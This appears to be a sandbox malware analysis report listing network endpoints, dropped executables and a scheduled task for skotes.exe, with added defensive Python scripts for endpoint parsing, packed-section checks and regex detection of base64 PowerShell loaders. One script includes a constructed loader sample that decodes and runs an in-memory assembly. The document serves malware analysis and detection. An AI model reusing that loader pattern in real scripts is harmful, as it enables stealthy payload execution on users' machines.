Source: unknown Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 50210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 50144 -> 443
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:50222 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50252 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.64.117.218:443 -> 192.168.2.5:50254 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50256 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50257 version: TLS 1.2
Source: unknown HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50258 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50260 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50264 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.210.122.61:443 -> 192.168.2.5:50270 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50273 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50285 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50286 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50290 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50292 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50294 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50296 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50297 version: TLS 1.2
Source: unknown HTTPS traffic detected: 176.9.192.202:443 -> 192.168.2.5:50298 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50301 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50303 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50304 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50306 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50309 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50311 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50313 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:50324 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Windows user hook set: 0 mouse low level NULL
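Triage note with an added example (not part of the Joe Sandbox report): the "HTTP traffic on port ... -> 443" entries above record only the sandbox client's ephemeral ports, while the "HTTPS traffic detected" entries carry the server address, so only the latter yield endpoint indicators. The script below parses a handful of lines copied from the entries above, skips the port-only lines, drops the sandbox guest's private address, and counts TLS sessions per external server. The parsing logic and the function names are assumptions of this example, not something the report provides.

```python
import ipaddress
import re
from collections import Counter

# Eight lines copied from the report's "HTTPS traffic detected" entries above, plus one
# port-only line, embedded here so the script runs offline against a constructed input.
SAMPLE_LINES = """\
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50244 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.174.133:443 -> 192.168.2.5:50247 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50278 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50282 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50285 version: TLS 1.2
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
"""

# The report writes the flow server-side first: <server ip>:443 -> <sandbox client>:<ephemeral port>
LINE_RE = re.compile(
    r"HTTPS traffic detected: "
    r"(?P<server_ip>[\d.]+):(?P<server_port>\d+) -> "
    r"(?P<client_ip>[\d.]+):(?P<client_port>\d+) version: (?P<tls>TLS [\d.]+)"
)


def parse_https_lines(text):
    """Yield (server_ip, server_port, client_ip, client_port, tls_version) for each HTTPS entry."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # "HTTP traffic on port" lines carry no server address, so they are skipped
        yield (m["server_ip"], int(m["server_port"]), m["client_ip"], int(m["client_port"]), m["tls"])


def remote_endpoint_counts(text):
    """Count TLS sessions per external server (ip, port); private addresses are the sandbox itself."""
    counts = Counter()
    for server_ip, server_port, _client_ip, _client_port, _tls in parse_https_lines(text):
        if ipaddress.ip_address(server_ip).is_private:
            continue
        counts[(server_ip, server_port)] += 1
    return counts


def tls_versions(text):
    """Distinct TLS versions negotiated, useful for spotting downgraded or unusual clients."""
    return sorted({tls for *_, tls in parse_https_lines(text)})


if __name__ == "__main__":
    for (ip, port), n in remote_endpoint_counts(SAMPLE_LINES).most_common():
        print(f"{ip}:{port}  sessions={n}")
    print("TLS versions:", tls_versions(SAMPLE_LINES))
```

Feed the whole "Networking" section of the report to remote_endpoint_counts to get the full endpoint list. Treat the result as a pivot list rather than a blocklist: several of the addresses above sit on shared CDN and cloud edges (for example the 172.67.x and 188.114.96.x Cloudflare ranges and the Microsoft ranges used for telemetry and sign-in), so the domain or SNI behind each session, not the IP, is the indicator worth acting on.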

System Summary

Source: amsi32_8712.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 8712, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
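The rule above matched in the AMSI buffer (amsi32_8712.amsi.csv) and in powershell.exe memory, which is where a base64-embedded payload shows up decoded even when the script on disk is obfuscated. The following is an added illustration of the pattern class the rule description names (base64 decoding, string concatenation, execution); it is a simplified stand-in written for this page, not ditekSHen's rule and not the script from this analysis. Both PowerShell samples are constructed, and the three regexes are assumptions of the example.

```python
import re

# Constructed sample in the style the rule targets: a long base64 blob split across
# concatenated literals, decoded, and executed in memory. Not the real dropper script.
MALICIOUS_SAMPLE = r"""
$a = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
$bytes = [System.Convert]::FromBase64String($a)
$asm = [System.Reflection.Assembly]::Load($bytes)
$asm.EntryPoint.Invoke($null, $null)
"""

# Constructed benign sample: base64 is used for an HTTP Basic header, nothing is decoded or executed.
BENIGN_SAMPLE = r"""
$creds = Get-Credential
$enc = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('user:pass'))
Invoke-RestMethod -Uri https://example.invalid/api -Headers @{Authorization = "Basic $enc"}
"""

PATTERNS = {
    # decoding of an embedded payload
    "base64_decode": re.compile(r"FromBase64String\s*\(", re.I),
    # two long base64-alphabet literals joined with '+', the splitting trick that defeats naive string matching
    "string_concat": re.compile(
        r"['\"][A-Za-z0-9+/=]{20,}['\"]\s*\+\s*['\"][A-Za-z0-9+/=]{20,}['\"]"
    ),
    # common ways of running the decoded content
    "execution": re.compile(
        r"(Invoke-Expression|\bIEX\b|\[System\.Reflection\.Assembly\]::Load|\.EntryPoint\.Invoke|Start-Process)",
        re.I,
    ),
}


def score_powershell(script):
    """Return which of the three indicator classes are present in the script text."""
    return {name: bool(rx.search(script)) for name, rx in PATTERNS.items()}


def looks_like_base64_loader(script):
    """Require all three indicators together; any one alone is common in benign administration scripts."""
    hits = score_powershell(script)
    return hits["base64_decode"] and hits["execution"] and hits["string_concat"]


if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, score_powershell(sample), "->", looks_like_base64_loader(sample))
```

Run it over the script-block text from the AMSI log or from Microsoft-Windows-PowerShell/Operational event 4104 rather than over the file on disk; that is the representation in which the rule fired here, and the only one in which concatenated or encoded literals are guaranteed to be visible.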
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name:
Source: DocumentsECAFHIIJJE.exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.20.dr Static PE information: section name:
Source: skotes.exe.20.dr Static PE information: section name: .idata
Source: random[1].exe.23.dr Static PE information: section name:
Source: random[1].exe.23.dr Static PE information: section name: .idata
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name:
Source: 0ac2a0f3ae.exe.23.dr Static PE information: section name: .idata
Source: file1[1].exe.23.dr Static PE information: section name:
Source: file1[1].exe.23.dr Static PE information: section name: .rsrc
Source: file1[1].exe.23.dr Static PE information: section name: .idata
Source: file1[1].exe.23.dr Static PE information: section name:
Source: file1.exe.23.dr Static PE information: section name:
Source: file1.exe.23.dr Static PE information: section name: .rsrc
Source: file1.exe.23.dr Static PE information: section name: .idata
Source: file1.exe.23.dr Static PE information: section name:
Source: 4136f86ac7.exe.23.dr Static PE information: section name:
Source: 4136f86ac7.exe.23.dr Static PE information: section name: .idata
Source: random[1].exe0.23.dr Static PE information: section name:
Source: random[1].exe0.23.dr Static PE information: section name: .rsrc
Source: random[1].exe0.23.dr Static PE information: section name: .idata
Source: random[1].exe0.23.dr Static PE information: section name:
Source: 3160604f40.exe.23.dr Static PE information: section name:
Source: 3160604f40.exe.23.dr Static PE information: section name: .rsrc
Source: 3160604f40.exe.23.dr Static PE information: section name: .idata
Source: 3160604f40.exe.23.dr Static PE information: section name:
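The "section name:" entries above that end with nothing after the colon are sections whose 8-byte name is empty or made of characters the report could not render, which is what the "PE file contains section with special chars" signature in the overview keys on; the same pattern repeats across file.exe and every dropped executable listed. As an added example (not code from the report or from any tool it mentions), the script below reads PE section headers directly and flags names that are empty or fall outside printable ASCII. The minimal PE it builds for itself is a constructed test input, and the flagging threshold is this example's own assumption.

```python
import struct


def build_minimal_pe(section_names):
    """Construct a tiny PE32 header set with the given raw section names (test input only, not a real binary)."""
    num = len(section_names)
    opt_size = 224  # size of a standard PE32 optional header
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: the PE signature follows the DOS header
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, num, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)  # PE32 magic
    sections = b""
    for name in section_names:
        raw = name[:8].ljust(8, b"\x00")
        # Name(8), VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
        sections += raw + struct.pack("<IIIIIIHHI", 0x1000, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + sections


def pe_section_names(data):
    """Return the raw 8-byte name of every section header in a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    coff_off = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff_off + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff_off + 16)[0]
    sect_off = coff_off + 20 + opt_size  # section table follows the optional header
    return [data[sect_off + i * 40: sect_off + i * 40 + 8] for i in range(num_sections)]


def is_suspicious_section_name(raw):
    """Empty names and names with bytes outside printable ASCII are what packers and crypters typically leave."""
    name = raw.rstrip(b"\x00")
    if not name:
        return True  # rendered by the report as "section name:" with nothing after it
    return any(b < 0x21 or b > 0x7E for b in name)


def suspicious_sections(data):
    """(index, raw name) for every section whose name fails the printable-ASCII check."""
    return [(i, raw) for i, raw in enumerate(pe_section_names(data)) if is_suspicious_section_name(raw)]


# Constructed sample mirroring the pattern in the report: an unnamed section, .rsrc, .idata, and a garbage name.
SAMPLE_PE = build_minimal_pe([b"", b".rsrc", b".idata", b"\x01\x7f\xe2abc"])

if __name__ == "__main__":
    for i, raw in enumerate(pe_section_names(SAMPLE_PE)):
        flag = "SUSPICIOUS" if is_suspicious_section_name(raw) else "ok"
        print(f"section {i}: {raw!r} {flag}")
```

Against a real sample use pe_section_names(open(path, "rb").read()); a name that fails the check is a packing indicator, not proof of malice on its own, and the report's "Detected unpacking (changes PE section rights)" finding is the complementary dynamic signal that the packed section was later made executable.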
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C68B700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C68B8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C68B910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C62F280
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FFCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 23_2_00FFCB97
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6235A0 0_2_6C6235A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C635440 0_2_6C635440
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69545C 0_2_6C69545C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69542B 0_2_6C69542B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69AC00 0_2_6C69AC00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C665C10 0_2_6C665C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C672C10 0_2_6C672C10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62D4E0 0_2_6C62D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C666CF0 0_2_6C666CF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6364C0 0_2_6C6364C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64D4D0 0_2_6C64D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6834A0 0_2_6C6834A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68C4A0 0_2_6C68C4A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C636C80 0_2_6C636C80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63FD00 0_2_6C63FD00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64ED10 0_2_6C64ED10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C650512 0_2_6C650512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6885F0 0_2_6C6885F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C660DD0 0_2_6C660DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C696E63 0_2_6C696E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62C670 0_2_6C62C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C644640 0_2_6C644640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C672E4E 0_2_6C672E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C649E50 0_2_6C649E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C663E50 0_2_6C663E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C689E30 0_2_6C689E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C675600 0_2_6C675600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C667E10 0_2_6C667E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6976E3 0_2_6C6976E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62BEF0 0_2_6C62BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63FEF0 0_2_6C63FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C684EA0 0_2_6C684EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68E680 0_2_6C68E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C645E90 0_2_6C645E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C639F00 0_2_6C639F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C667710 0_2_6C667710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62DFE0 0_2_6C62DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C656FF0 0_2_6C656FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6777A0 0_2_6C6777A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66F070 0_2_6C66F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C648850 0_2_6C648850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64D850 0_2_6C64D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66B820 0_2_6C66B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C674820 0_2_6C674820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C637810 0_2_6C637810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64C0E0 0_2_6C64C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6658E0 0_2_6C6658E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6950C7 0_2_6C6950C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6560A0 0_2_6C6560A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63D960 0_2_6C63D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C67B970 0_2_6C67B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69B170 0_2_6C69B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64A940 0_2_6C64A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62C9A0 0_2_6C62C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65D9B0 0_2_6C65D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C665190 0_2_6C665190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C682990 0_2_6C682990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C669A60 0_2_6C669A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C641AF0 0_2_6C641AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66E2F0 0_2_6C66E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C668AC0 0_2_6C668AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6222A0 0_2_6C6222A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C654AA0 0_2_6C654AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63CAB0 0_2_6C63CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C692AB0 0_2_6C692AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69BA90 0_2_6C69BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63C370 0_2_6C63C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C625340 0_2_6C625340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66D320 0_2_6C66D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6953C8 0_2_6C6953C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62F380 0_2_6C62F380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DAC60 0_2_6C6DAC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7AAC30 0_2_6C7AAC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C796C00 0_2_6C796C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72ECD0 0_2_6C72ECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6CECC0 0_2_6C6CECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79ED70 0_2_6C79ED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FAD50 0_2_6C7FAD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85CDC0 0_2_6C85CDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C858D20 0_2_6C858D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D4DB0 0_2_6C6D4DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C766D90 0_2_6C766D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76EE70 0_2_6C76EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B0E20 0_2_6C7B0E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DAEC0 0_2_6C6DAEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770EC0 0_2_6C770EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C756E90 0_2_6C756E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C792F70 0_2_6C792F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C818FB0 0_2_6C818FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73EF40 0_2_6C73EF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D6F10 0_2_6C6D6F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7AEFF0 0_2_6C7AEFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D0FE0 0_2_6C6D0FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C810F20 0_2_6C810F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DEFB0 0_2_6C6DEFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7A4840 0_2_6C7A4840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C720820 0_2_6C720820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C75A820 0_2_6C75A820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D68E0 0_2_6C7D68E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7BC8C0 0_2_6C7BC8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C708960 0_2_6C708960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C726900 0_2_6C726900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7049F0 0_2_6C7049F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EC9E0 0_2_6C7EC9E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7909B0 0_2_6C7909B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7609A0 0_2_6C7609A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78A9A0 0_2_6C78A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74CA70 0_2_6C74CA70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C788A30 0_2_6C788A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C77EA00 0_2_6C77EA00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74EA80 0_2_6C74EA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D6BE0 0_2_6C7D6BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D8BAC 0_2_6C6D8BAC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770BA0 0_2_6C770BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E8460 0_2_6C6E8460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C75A430 0_2_6C75A430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C734420 0_2_6C734420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7164D0 0_2_6C7164D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76A4D0 0_2_6C76A4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FA480 0_2_6C7FA480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770570 0_2_6C770570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C732560 0_2_6C732560
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C728540 0_2_6C728540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D4540 0_2_6C7D4540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C75E5F0 0_2_6C75E5F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79A5E0 0_2_6C79A5E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C818550 0_2_6C818550
